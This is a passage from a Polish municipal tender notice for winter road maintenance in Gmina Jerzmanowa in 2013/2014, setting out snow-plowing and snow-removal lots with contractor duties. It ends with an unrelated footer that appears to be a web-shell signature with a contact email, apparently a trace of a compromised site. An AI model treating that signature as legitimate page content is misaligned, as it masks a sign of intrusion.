(60 min) tzn. Wykonawca zapewni gotowość do wykonania usługi w ciągu 1 godziny od zawiadomienia Zamawiającego. 12. Zamawiający decyduje o rozpoczęciu usługi i wskazuje jej rodzaj i zakres. 13. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym. 14. Realizacja przedmiotu zamówienia odbywać się będzie w systemie pracy ciągłej (24 godziny na dobę). 15. Zamawiający dopuszcza możliwość zmian kolejności wykonywania przedmiotu zamówienia w zależności od warunków atmosferycznych. 16. Wskazanie lokalizacji płużenia będzie odbywać się sukcesywnie wg potrzeb Zamawiającego, w okresie obowiązywania umowy. 17. Wykonawca zobowiązany jest do składania meldunków do siedziby Zamawiającego pracownikowi Urzędu Gminy telefonicznie każdego dnia w godzinach pracy urzędu 7.15 - 15.15 (od poniedziałku do piątku z wyłączeniem świąt oraz dni wolnych od pracy) z podaniem czasookresu pracy za dzień poprzedni. Za okres pracy w sobotę, niedzielę święta meldunek należy podać następnego dnia roboczego. 18. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze. 19. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług. 20. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług. 21. Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na potrzeby złożenia prawidłowej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa płużenia dróg na terenie miejscowości Modła, Kurowice, Łagoszów Mały oraz Maniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość). 2. Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 - ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011. 3. Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa. Część 3: Usługa płużenia dróg na terenie miejscowości Modła, Kurowice, Łagoszów Mały oraz Maniów. 4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu: dla Części 3 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność. 8. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę. 9. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi. 10. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy 11. Czas reakcji Wykonawcy od powiadomienia przez pracownika Urzędu Gminy nie powinien być dłuższy niż 1 godzina (60 min) tzn. Wykonawca zapewni gotowość do wykonania usługi w ciągu 1 godziny od zawiadomienia Zamawiającego. 12. Zamawiający decyduje o rozpoczęciu usługi i wskazuje jej rodzaj i zakres. 13. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym. 14. Realizacja przedmiotu zamówienia odbywać się będzie w systemie pracy ciągłej (24 godziny na dobę). 15. Zamawiający dopuszcza możliwość zmian kolejności wykonywania przedmiotu zamówienia w zależności od warunków atmosferycznych. 16. Wskazanie lokalizacji płużenia będzie odbywać się sukcesywnie wg potrzeb Zamawiającego, w okresie obowiązywania umowy. 17. Wykonawca zobowiązany jest do składania meldunków do siedziby Zamawiającego pracownikowi Urzędu Gminy telefonicznie każdego dnia w godzinach pracy urzędu 7.15 - 15.15 (od poniedziałku do piątku z wyłączeniem świąt oraz dni wolnych od pracy) z podaniem czasookresu pracy za dzień poprzedni. Za okres pracy w sobotę, niedzielę święta meldunek należy podać następnego dnia roboczego. 18. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze. 19. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług. 20. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług. 21. Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na potrzeby złożenia prawidłowej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa płużenia dróg na terenie miejscowości Smardzów oraz Jaczów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość). 2. Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 - ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011. 3. Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa. Część 4: Usługa płużenia dróg na terenie miejscowości Smardzów oraz Jaczów. 4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu: dla Części 4 jedną sztuką Koparko - Ładowarki z lemieszem (na lemieszu powinna być założona guma) lub jednej sztuki Ciągnika rolniczego z lemieszem (na lemieszu powinna być założona guma) wraz z informacją o podstawie dysponowania tym sprzętem. 7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność. 8. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę. 9. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi. 10. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy 11. Czas reakcji Wykonawcy od powiadomienia przez pracownika Urzędu Gminy nie powinien być dłuższy niż 1 godzina (60 min) tzn. Wykonawca zapewni gotowość do wykonania usługi w ciągu 1 godziny od zawiadomienia Zamawiającego. 12. Zamawiający decyduje o rozpoczęciu usługi i wskazuje jej rodzaj i zakres. 13. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym. 14. Realizacja przedmiotu zamówienia odbywać się będzie w systemie pracy ciągłej (24 godziny na dobę). 15. Zamawiający dopuszcza możliwość zmian kolejności wykonywania przedmiotu zamówienia w zależności od warunków atmosferycznych. 16. Wskazanie lokalizacji płużenia będzie odbywać się sukcesywnie wg potrzeb Zamawiającego, w okresie obowiązywania umowy. 17. Wykonawca zobowiązany jest do składania meldunków do siedziby Zamawiającego pracownikowi Urzędu Gminy telefonicznie każdego dnia w godzinach pracy urzędu 7.15 - 15.15 (od poniedziałku do piątku z wyłączeniem świąt oraz dni wolnych od pracy) z podaniem czasookresu pracy za dzień poprzedni. Za okres pracy w sobotę, niedzielę święta meldunek należy podać następnego dnia roboczego. 18. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze. 19. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług. 20. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług. 21. Zamawiający zaleca Wykonawcom dokonanie wizji lokalnej na potrzeby złożenia prawidłowej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługa wywozu nadmiaru śniegu z terenu Gminy Jerzmanowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zimowe utrzymanie dróg obejmuje zakres prac mających na celu zapewnienie przejezdności oraz ograniczenie zakłóceń płynności ruchu drogowego spowodowanych zjawiskami atmosferycznymi (opady śniegu, opady deszczu ze śniegiem, marznąca mżawka lub śliskość) oraz wywozem nadmiaru śniegu w razie konieczności. 2. Usługi mają charakter wspomagający dla zadania pn. Zimowe utrzymanie dróg gminnych na terenie Gminy Jerzmanowa w sezonie zimowym 2011/2012, 2012/2013, 2013/2014 - ogłoszonego przez Gminę Jerzmanowa w roku 2011 w UZP nr 254493-2011. 3. Przedmiotem zamówienia jest świadczenie usług na żądanie Zamawiającego polegających na zimowym utrzymaniu dróg gminnych w okresie zimowym 2013/2014 na terenie Gminy Jerzmanowa. Część 5: Usługa wywozu nadmiaru śniegu z terenu Gminy Jerzmanowa. 4. Zamówienie będzie realizowane wg faktycznych potrzeb Zamawiającego. Termin wykonania zamówienia: od dnia podpisania umowy do dnia 15.04.2014r. 5. Do zapewnienia przejezdności dróg na terenie Gminy Jerzmanowa, Zamawiający przewiduje, że będzie potrzebował w sezonie zimowym 2013/2014 odpowiedni sprzęt. 6. Wykonawca powinien wykazać się dysponowaniem co najmniej jedną sztuką poniżej wymienionego sprzętu dla każdej z Części przedmiotu zamówienia: Dla Części 5 - jedną sztuką samochodu samowyładowczego oraz jedną sztuką sprzętu do załadunku wraz z informacją o podstawie dysponowania tym sprzętem. 7. Wykonawca zobowiązuje się oznakować pojazdy niezbędne do realizowania przedmiotu zamówienia zgodnie z obowiązującymi przepisami - za co ponosi pełną odpowiedzialność. 8. Wykonawca zapewnia sprzęt niezbędny do wykonania przedmiotu umowy a ich eksploatacja i utrzymanie obciąża Wykonawcę. 9. Zamawiający ponosi jedynie koszty rzeczywistej pracy sprzętu związanego z zimowym utrzymaniem dróg (w koszt usługi nie wlicza się kosztu dojazdu na miejsce wykonywania usługi) zgodnie ze stawką 1h zaproponowaną w złożonej przez Wykonawcę ofercie. 10. Wykonawca zostanie poinformowany przez pracownika Urzędu Gminy Jerzmanowa o miejscu i terminie wykonania usługi. 11. Wskazanie lokalizacji odśnieżania i wywozu nadmiaru śniegu dla każdej z części będzie odbywać się na żądanie Zamawiającego sukcesywnie wg jego potrzeb, w okresie obowiązywania umowy 12. Usługa wywozu nadmiaru śniegu polegać będzie na załadunku śniegu na samochód samowyładowczy oraz wywóz śniegu w miejsce zabezpieczone przez Wykonawcę. Wykonawca wskaże miejsce składowania śniegu i ponosi wszelkie koszty z tym związane. Miejsce składowania śniegu które nie może stwarzać zagrożenia dla ludzi i mienia. 13. Zamawiający decyduje o rozpoczęciu usługi i wskazuje jej rodzaj i zakres. 14. Wykonanie usługi wywozu nadmiaru śniegu własnym sprzętem przystosowanym do wywozu nadmiaru śniegu odbywać się będzie wyłącznie po zgłoszeniu zapotrzebowania przez Zamawiającego oraz po wytyczeniu miejsca i zakresu usługi. 15. Wykonawca zobowiązany jest do zapewnienia całodobowej łączności telefonicznej z Zamawiającym. 16. Wykonawca ponosi odpowiedzialność materialną za wszelkie szkody spowodowane z jego winy oraz z winy osób, które biorą udział przy wykonywaniu usługi, w szczególności dotyczy to wyrządzonych szkód w infrastrukturze. 17. Wykonawca w trakcie wykonywania usługi ponosi odpowiedzialność za bezpieczeństwo swoich pracowników oraz innych osób znajdujących się w obrębie prowadzonych usług. 18. Wykonawca zobowiązany jest do wykonania usługi zgodnie z wiedzą techniczną, obowiązującymi przepisami i normami oraz przy zachowaniu przepisów BHP, przy maksymalnym ograniczeniu uciążliwości prowadzenia usług.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.71.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com